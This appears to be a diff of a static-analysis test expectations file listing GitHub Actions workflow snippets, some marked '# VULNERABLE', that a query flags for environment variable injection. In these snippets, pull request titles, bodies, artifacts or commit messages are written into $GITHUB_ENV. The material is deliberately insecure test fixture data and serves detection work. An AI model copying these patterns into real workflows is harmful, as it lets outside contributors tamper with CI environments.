| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
